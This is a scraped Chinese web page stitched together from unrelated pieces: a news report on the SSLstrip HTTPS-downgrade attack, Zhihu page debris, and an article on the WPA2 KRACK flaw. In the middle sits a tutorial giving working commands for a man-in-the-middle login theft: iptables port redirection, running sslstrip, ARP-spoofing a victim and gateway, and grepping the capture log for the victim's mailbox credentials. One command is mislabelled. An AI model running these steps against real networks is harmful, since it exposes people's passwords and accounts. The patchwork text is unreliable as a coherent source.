新型SSL网站攻击惊现 影响多家知名网站
来源：IT168网站
　作者: 彭海燕　编辑:
　　【IT168 资讯】近日，一名自称Moxie Marlinspike的研究员发现了一种新型的破解SSL协议的方法。SSL主要用于电子商务和银行等一系列网站的安全登陆保护。　　这位研究员表示，攻击使用了一个可以利用http和https会话之间的接口的SSLstrip工具，并演示了通过劫持安全套接字协议层(SSL)会话来截获注册数据的方法。据悉，SSLstrip可以通过中间人(man-in-the-middles )的方式攻击网络里所有的潜在SSL连接，特别是http和https之间的接口。　　为了证明这种攻击的威力，他还声称自己在24小时内已经截获了117个电子邮件帐户，7个Paypal注册资料，16张信用卡号码，以及涉及百度、Hotmail、Gmail和Ticketmaster等网站的其他300多个安全登陆详细信息。　　该攻击主要依赖于用户在浏览器中输入URL却没有直接激活SSL会话，而大部分用户激活(SSL)会话都是通过点击提示的按钮。这些按钮一般出现在未加密的Http页面上，一旦点击它们将把用户带入加密的Https页面进行登录。　　Marlinspike称，SSLstrip之所以能够成功运行，是因为使用SSL的大多数网站通常首先为访问者提供一个未加密的页面，只有开始传输敏感信息部分时才开始提供加密保护。举例来说，当一个用户点击一个登录页面时，该工具会修改网站未加密的响应，使&https&变成&http&。然而，网站却一直以为连接是受加密保护的。　　为了让用户相信他正在使用一个加密的连接同预期的站点通信，SSLstrip利用了一些现成的漏洞：首先，此工具在局域网上使用了一个包含有效SSL证书的代理，使得浏览器会在地址栏显示一个&https&。其次，它使用homographic技术创建一个长的URL，在地址中包含了一系列伪造的斜杠。(为防止浏览器将这些字符转换成Punycode，他必须获得一个用于*.ijjk.cn的通配 SSL 数字证书)。　　&可怕的是它看来像https://gmail.com ，&Marlinspike说，&问题在于http和https之间的桥接，而这是SSL在web中部署方式的基础部分&。 要想改变这些绝非易事。&　　Marlinspike已经成功将该攻击应用于使用Firefox和Safari浏览器的用户身上，虽然他还没有在IE上做实验，但是估计也不会有什么问题。 即使没有，他说，也有足够的理由相信，即使小心谨慎的用户也不会将时间花在确保他们的会话是否被加密这些事情上。　　曾在2002演示了一个单独的https爆破工具SSLSniff的Marlinspike表示，目前，该漏洞还没有行之有效的解决方法，并且将来可能还会看到更多新型的利用方法。
IT168企业级
扫一扫关注
行车视线文章推荐扫一扫体验手机阅读
小试ettercap的MITM***（之二）：测试sslstrip
<span type="1" blog_id="1358587" userid='
19篇文章，7W+人气，0粉丝
企业级网安运维
￥51.0029人订阅
高并发架构之路
￥51.00156人订阅
9本网络安全实战书籍精华
￥51.00518人订阅
<span type="1" blog_id="1358587" userid='SSL中间人攻击－SSLstrip攻击为什么可以抓到明文密码？ - 知乎有问题，上知乎。知乎作为中文互联网最大的知识分享平台，以「知识连接一切」为愿景，致力于构建一个人人都可以便捷接入的知识分享网络，让人们便捷地与世界分享知识、经验和见解，发现更大的世界。15被浏览<strong class="NumberBoard-itemValue" title="分享邀请回答赞同 添加评论分享收藏感谢收起赞同 5 条评论分享收藏感谢收起写回答&&&&&&&&&&&
1、SSL解析
SSL 是 Secure Socket Layer 的简称， 中文意思是安全套接字层，由 NetScape公司所开发，用以保障在 Internet 上数据传输的安全，确保数据在网络的传输过程中不会被截取和窃听。
SSL 协议提供的服务主要有：　　（1）认证用户和服务器，确保数据发送到正确的客户和服务器。　　（2）加密数据以防止数据中途被窃取。　　（3）维护数据的完整性，确保数据在传输过程中不被改变。
2、SSLStrip
SSLStrip 的工作原理及步骤如下：　　（1） 先进行中间人攻击来拦截 HTTP 流量。　　（2） 将出现的 HTTPS 链接全部替换为 HTTP,同时记下所有改变的链接。　　（3） 使用 HTTP 与受害者机器连接。　　（4） 同时与合法的服务器建立 HTTPS。　　（5） 受害者与合法服务器之间的全部通信经过了代理转发。
　　（6） 其中，出现的图标被替换成为用户熟悉的&小黄锁&图标，以建立信任。
　　（7） 这样，中间人攻击就成功骗取了密码、账号等信息，而受害者一无所知。
注：下载地址：http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.9.tar.gz
3、SSLStrip进行攻击
　　测试环境：攻击机(kali)+受害机(随意)
　　攻击者：
　　　　启动网卡混杂模式：echo "1"&/proc/sys/net/ipv4/ip_forward
　　　　添加防火墙规则：iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 9527
　　　　　　-t：制定命令要操作的匹配包的表
　　　　　　-A：在选择的链末添加规则
　　　　　　-p：制定协议
　　　　　　--dport：制定端口
　　　　　　-j：目标跳转
　　　　开启SSLStrip：python sslstrip.py -a -l 9527 -w sslstrip.log
　　　　　　-a：记录所有来自服务器的ssl和Http数据流量内容；
　　　　　　-l：监听端口
　　　　　　-w：保存文件
　　　　开启arp欺骗：arpspoof -i eth0 -t 192.168.133.130(受害机) 192.168.133.2(网关)
　　受害机登陆126邮箱
　　攻击者查看日志：cat sslstrip.log | grep "邮箱名"
据说打了码可以去掉，这里就不上图了~~~~
阅读(...) 评论()Wi-Fi曝安全漏洞
面临KRACK攻击风险
（文/美国新思科技（Synopsys）高级安全顾问Mantej Singh Rajpal）近日， WPA2 被曝存在严重安全漏洞。WPA2 在2004年发布，自2006年3月起已经成为一种强制性的标准，是目前使用范围最广的 Wi-Fi 网络保护协议。
何为KRACK攻击？
在回答这个问题之前，让我们快速普及一些Crypto 101课程的内容。 高级加密标准（AES）已经采用了十几年。它是一种对称密钥密码，即使用相同的密钥来加密和解密。虽然传统上标准的AES加密位宽是128位的纯文本分组密码块，但它也可以用作流加密 – 也就是它在WPA2中的应用。现在，采用流加密算法的问题在于重新使用一个对称密钥中的随机数，可以完成握手中的全部解密过程 。然而随机数永远不允许在同一个密钥采用两次。在WPA2标准中，一个随机数基本上是一个数据包计数器，主要包括：
生成（0，密钥）→第一部分密钥流
生成（1，密钥）→第二部分密钥流
生成（2，密钥）→第三部分密钥流
生成（2 ^ 48，密钥）→最后一部分密钥流
一旦达到计数器的最大允许值（2 ^ 48），就会产生一个新的密钥，并将计数器复位为0。由于每当计数器重置为0（提示，提示）时，密码都被重设，因此，相同的对称密钥密码永远不会被重用。那么问题在哪里呢？
导致“密钥重装攻击”，即 KRACK (Key Reinstallation Attacks)。
KRACK漏洞允许一个攻击点接入到Wi-Fi接入点和客户端之间的通信过程中，强制客户端重装一个之前使用过的密钥，计数器将被置为0，而且导致密钥对重用。一旦密钥流被重用，那么攻击者可以（很轻松的）解密整个通信过程，窃取信用卡信息、用户密码或者更多资料。
谁会受到KRACK攻击的影响？
这个漏洞来自于WPA2标准本身，而不是任何错误的本地实现。因此，你拥有的所有支持Wi-Fi的产品，都可能会受到KRACK漏洞的影响。通过HTTPS访问网站时，会增加另一层安全性，你应该注意以下几点：
? 并非所有网站都支持HTTPS
? 启用HTTPS的网站可能会因为使用SSLstrip等工具降级为HTTP
? 很多物联网设备都以纯文本格式进行通讯，这是业内众所周知的诟病
最后一点尤为重要。例如你正在使用智能电视，那么你更需要谨慎，网上购物平台账号、其它应用程序或者含有隐私信息的账号最好不要一直保持登陆状态。
我还能使用WPA2吗？
就现在而言，答案是肯定的。WPA2提供的保护超过KRACK漏洞带来的风险。最好的操作方法是当安全补丁升级时立刻更新你的设备。例如，Microsoft已经在安全更新中修补了KRACK，而苹果推出了iOS和MacOS测试版的补丁。大多数供应商仍在修复过程中，在接下来的几周内有望陆续推出。留意这些安全更新，请及时安装它们！
责任编辑：
声明：该文观点仅代表作者本人，搜狐号系信息发布平台，搜狐仅提供信息存储空间服务。
今日搜狐热点}